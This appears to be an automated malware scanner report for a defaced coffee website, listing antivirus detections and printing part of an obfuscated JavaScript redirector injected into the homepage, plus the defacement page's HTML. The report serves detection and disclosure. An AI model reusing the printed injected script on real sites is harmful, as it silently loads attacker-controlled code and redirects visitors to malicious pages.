New scan:

Malware Scanner report for kittycatcoffee.com

Malicious/Suspicious/Total urls checked
1/0/2
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

Hacked by GHoST61  (152 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://kittycatcoffee.com/
200 OK
Content-Length: 3220
Content-Type: text/html
suspicious
Malicious code - confirmed by antiviruses (see below)

if (typeof(redef_colors)=="undefined") {
var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e4745', '#3d4444', '#3d4043', '#3f3d41', '#3f423e', '#79823e', '#798084', '#748188', '#3d7c78', '#7d3d7f', '#777f31', '#4d0000');
var redef_colors = 1;
var colors_picked = 0;
function div_pick_colors(t,styled) {
var s = "";
for (j=0;j<
... 566 bytes are skipped ...
!document.createElement){
document.write(div_pick_colors(div_colors,1));
} else {
var new_cstyle=document.createElement("script");
new_cstyle.type="text/javascript";
new_cstyle.src=div_pick_colors(div_colors,0);
document.getElementsByTagName("head")[0].appendChild(new_cstyle);
}
} catch(e) { }
try {
check_colors_picked();
} catch(e) {
setTimeout("try_pick_colors()", 500);
}
}
try_pick_colors();
}

Antivirus reports:

AntiVir
JS/Redirect.AC
Avast
JS:Redirector-IX [Trj]
Antiy-AVL
Trojan/JS.Redirector
Ikarus
Trojan.JS.Redirector
nProtect
Trojan.JS.Agent.EFE
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.R4FH1IO
Emsisoft
Trojan.JS.Agent.EFE (B)
Comodo
TrojWare.JS.Agent.AC
McAfee-GW-Edition
JS/Iframe.gen.m
Kaspersky
Trojan.JS.Redirector.qd
ViRobot
JS.A.Redirector.1413
Microsoft
VirTool:JS/Obfuscator.BK
MicroWorld-eScan
Trojan.JS.Agent.EFE
Fortinet
JS/Fraud.BBBK!tr
PCTools
Trojan.Gen
Jiangmin
Trojan/Script.Gen
McAfee
JS/Iframe.gen.m
NANO-Antivirus
Trojan.Script.Redirector.ductl
F-Secure
Trojan.JS.Agent.EFE
F-Prot
JS/Redir.FN
AVG
JS/Redir
Norman
Obfuscated.CD
Sophos
JS/ScrLd-E
GData
Trojan.JS.Agent.EFE
Symantec
Trojan.Gen
Commtouch
JS/Redir.FN
ESET-NOD32
JS/Kryptik.W.Gen
BitDefender
Trojan.JS.Agent.EFE

Deface/Content modification. The following signature was found: Hacked by GHoST61

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=Windows-1254" />
<link rel="shortcut icon" href="http://www.foliza61.com/favicon.ico" type="image/x-icon" />

<title>Hacked by GHoST61</title>
<link href="http://www.yavuztopel.com/index.css" rel="stylesheet" type="text/css" />
</head>

<body>
<table width="100%" border="0" cellspacing="0" cellpadding="0" style="background:url(http://www.yavuztopel.com/bg.png) top repeat-x;">
<tr>
<td width="331" valign="top"><img src="http://www.yavuztopel.com/root/atam.jpg" width="300" height
...[2889 bytes skipped]...


http://kittycatcoffee.com/test404page.js
404 Not Found
Content-Length: 399
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: kittycatcoffee.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 13 Oct 2015 12:25:25 GMT
Accept-Ranges: bytes
Server: nginx/1.8.0
Content-Length: 3220
Content-Type: text/html
Last-Modified: Mon, 28 Mar 2011 01:10:11 GMT

...3220 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kittycatcoffee.com
Referer: http://www.google.com/search?q=kittycatcoffee.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=kittycatcoffee.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kittycatcoffee.com/

Result: kittycatcoffee.com is not infected or malware details are not published yet.